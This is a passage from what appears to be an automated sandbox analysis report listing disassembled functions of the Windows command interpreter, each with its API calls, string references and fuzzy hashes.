                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4208585293-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eb4f710db2c9b6498af9edd0c054ea2a10158bc5138026ee5b84518e9a9952e5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f1d4363503e18522d57c1f704885b1d5b4e485a13f5bc9ee300a700cec0708d0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb4f710db2c9b6498af9edd0c054ea2a10158bc5138026ee5b84518e9a9952e5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60217171610304AFEB246F70DC49FBB769DEF85361F104628F555C21E1DEB58C418621
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000238D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 91c48a4eec840292636189c814bf6927fd9155ed9e058b16015ca9b662820b03
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a2d74f1acf39e030aad47ed5daf5720784e0b71f9c633f3bddb740a000dd9dd6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91c48a4eec840292636189c814bf6927fd9155ed9e058b16015ca9b662820b03
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94918E716083529BE774DB14E885BABB3E4BF88344F00093DE98996191EB78EA44CB53
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001BF70 Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0001C1B7
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 0001C1FC
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 0001C28A
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,000000FF), ref: 0002CFB0
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,000000FF), ref: 0002CFC4
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2863075230-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0b5f4ef81487fdc2353bb9ea89a00372e0225b3c8131c0a74661e786a4b4e340
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a500fc0e27b01309109a7d5c913c4caedc30ee4c86cc49705e533652fd2e68cc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b5f4ef81487fdc2353bb9ea89a00372e0225b3c8131c0a74661e786a4b4e340
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7F19175D40215DBDB24CF98C891AFEB7F1BF89700F25821ED816A7280E7759E82CB90
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000226DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00022795
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002280E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 0002281D
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 00022857
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 0002290B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DIRCMD
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1405722092-1465291664
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e2e110a40664f31ca1e2eaadb2a14d7d6f83bf09be2eb6978978a0285ed8f092
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5b3378cf7399dc38938801f4877e683670110715d824200a523445a78d2bc0c7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2e110a40664f31ca1e2eaadb2a14d7d6f83bf09be2eb6978978a0285ed8f092
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 757156B1A0D3829BD364DF69E884A9FBBE4BF89304F10492EF58983251DB34C944CB57
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000231EA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2770779731-632268628
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3a6800f569afd6cecd9a9303e22eddacd04d901ba036741a669975df7bdcad83
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f0a508e18b57a544d014f04e0b064d49577244b2a621fb3c253691d8e3d95eae
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a6800f569afd6cecd9a9303e22eddacd04d901ba036741a669975df7bdcad83
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C119132304622DFA7645F6AFC44877B7E9EF9B761320006EF580C7250EB29DD448674
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000149F8 Relevance: 12.2, APIs: 8, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: _get_osfhandle.MSVCRT ref: 00019A1C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0001793A,00000104,?), ref: 00019A2B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A47
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A56
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374), ref: 00019A61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00058E04,?,?,?,?,?,?,?,?,?,?,?,?,00017908,00002374,-00000001), ref: 00019A6A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 000286E3
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 000286EB
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 0002872A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00028743
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0002874B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: _get_osfhandle.MSVCRT ref: 00019B4E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00050AF0,000000FF,0004A7F0,00002000,00000000,00000000), ref: 00019B8E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0004A7F0,-00000001,?,00000000), ref: 00019BA3
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001), ref: 000287CE
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1333215474-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2f3d6447f842241e2fcf2f24d5aae2831955567e91bcc973d1be0992065496e1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 863c3c9c671818ab49215de728eb904e846779b592f83070be929e54aa94f426
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f3d6447f842241e2fcf2f24d5aae2831955567e91bcc973d1be0992065496e1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E51C635745311EBDB28AB74E899BEEB7E8EF00715F10892AF502D7181EB74ED408B51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00016150 Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 000161E4
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3458554142-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dddc842678d5418be84e582d74828d6a7725fddb925e7a4d0bbcd9fc64daf202
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b289f3d1d4d62622a64812392af2d07fe6dd99b930e930d290fe521bc24e021
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dddc842678d5418be84e582d74828d6a7725fddb925e7a4d0bbcd9fc64daf202
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A91C1B4A04624DFEB64DF64ED45AAE77F8FF4A310F10812EE805D7290EB765880CB56
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001A6A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: ELSE$IF/?
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2081463915-1134991328
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8824a4dd2e293688f155804479593a004918f851116615f13de7363a49afa672
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c561254fc22a107414ca51ca46a6958c255a769b7ea2622cf78e7ca166285731
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8824a4dd2e293688f155804479593a004918f851116615f13de7363a49afa672
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 375148723083119AFB749B75AC4AFEF33E49B46320F14442AE5428B1D2EAB5C9C5C757
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000262C0 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002643A: NtOpenThreadToken.NTDLL ref: 00026454
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 0002646C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002643A: NtClose.NTDLL ref: 000264BD
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 000263B5
                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 000263E3
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlNtStatusToDosError.NTDLL ref: 00031EF4
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00031EFB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00031F6B
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 00031F86
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 00031FA4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00039C96,0002FDFA,00000000,?), ref: 0002642F
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1313749407-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3ee4670a2c706ce8dff094e889b94f8c4aa642ae03dd91de303e04c2b1b72549
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c01c7c6311beb8809551cdf66c09e5531ece05f1ba38a5578cdfa4f3ba850d89
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ee4670a2c706ce8dff094e889b94f8c4aa642ae03dd91de303e04c2b1b72549
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB51F731A002394BDF64DF65AC887EE73E4EF59314F1401A9E909E7291EB75DE818B90
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00039A7D Relevance: 10.6, APIs: 7, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00039AC2
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00039B22
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00039B32
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00039BAD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00039BB8
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00039BCB
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 00039BF9
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
